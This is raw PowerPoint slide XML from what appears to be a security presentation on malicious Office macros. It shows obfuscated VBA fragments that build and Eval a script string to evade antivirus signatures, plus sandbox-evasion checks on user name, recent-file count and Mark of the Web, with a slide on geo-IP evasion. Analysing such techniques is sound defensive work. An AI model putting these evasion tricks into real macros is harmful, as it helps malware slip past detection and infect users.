                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HiMWEvW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tACQbxz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TdFOvON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KpjCfTl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iFmDTdJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vxBTxig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JdUbOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZkDCLuH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>QoPruhI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>YevAqf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aXsRkuR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jfzvQr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ttojQNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nkWAiS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>slKOuqD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tLTWJX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FDWhxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XiVbbH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fnsMYuL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ANGaHu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hQTvJn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oScript.Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cRDKjqJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NNyPaYU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>YWARXWz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oScript.Eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ehhpzr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Speech Bubble: Rectangle with Corners Rounded 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5380037" y="144461"/>
            <a:ext cx="6097184" cy="760413"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46630"/>
              <a:gd name="adj2" fmla="val 88554"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1E1E1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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infinite possibilities to evade AV signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295630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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="503237" y="1082536"/>
            <a:ext cx="10591800" cy="5538926"/>
            <a:chOff x="503237" y="1082536"/>
            <a:chExt cx="10591800" cy="5538926"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="503237" y="1082536"/>
              <a:ext cx="10591800" cy="553892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503237" y="1197654"/>
              <a:ext cx="10372715" cy="5288669"/>
              <a:chOff x="1270968" y="1731054"/>
              <a:chExt cx="10372715" cy="5288669"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Picture 3"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1270968" y="1764633"/>
                <a:ext cx="6586014" cy="5255090"/>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8357568" y="1731054"/>
                <a:ext cx="3286115" cy="1977763"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="93260" tIns="46630" rIns="93260" bIns="46630">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="932597">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="4080" b="1" kern="0" dirty="0">
                    <a:ln w="22225">
                      <a:solidFill>
                        <a:srgbClr val="FFC000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent5">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Highly Polished Lures</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="884610" y="1436326"/>
            <a:ext cx="6590928" cy="525270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1417809" y="1571465"/>
            <a:ext cx="6591130" cy="525509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1931628" y="1639034"/>
            <a:ext cx="6591130" cy="525509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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296141" y="1844535"/>
            <a:ext cx="7005992" cy="49736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415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03542" y="220662"/>
            <a:ext cx="5029390" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>248a5f02d176d2355bd6191724f5dcf49614fb4d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465637" y="1070081"/>
            <a:ext cx="7659359" cy="5549690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="34076"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="350837" y="1076430"/>
            <a:ext cx="6241568" cy="5391150"/>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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503237" y="4106862"/>
            <a:ext cx="1676400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">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787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9437" y="830262"/>
            <a:ext cx="8362031" cy="2320209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23531019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Environment Vetting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700062" y="1594777"/>
            <a:ext cx="7108510" cy="1822995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Application.UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = s("SPWSBPU", 19, 12) Then </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     Error out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1836" kern="0" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Application.RecentFiles.Count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; 3 Then </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     Error out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7457065" y="1397701"/>
            <a:ext cx="4592803" cy="734534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="93260" tIns="46630" rIns="93260" bIns="46630">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4080" b="1" kern="0" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Check User Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6835272" y="2630898"/>
            <a:ext cx="5581926" cy="734534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="93260" tIns="46630" rIns="93260" bIns="46630">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4080" b="1" kern="0" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Check Recent File List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="341199" y="3850265"/>
            <a:ext cx="9342382" cy="2984892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913438" y="4688785"/>
            <a:ext cx="6250766" cy="722035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="93260" tIns="46630" rIns="93260" bIns="46630">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4080" b="1" kern="0" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Check Mark of the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7953880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Geo IP Evasion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="596711" y="1724345"/>
            <a:ext cx="4162089" cy="501863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5023577" y="2212005"/>
            <a:ext cx="3034729" cy="670445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
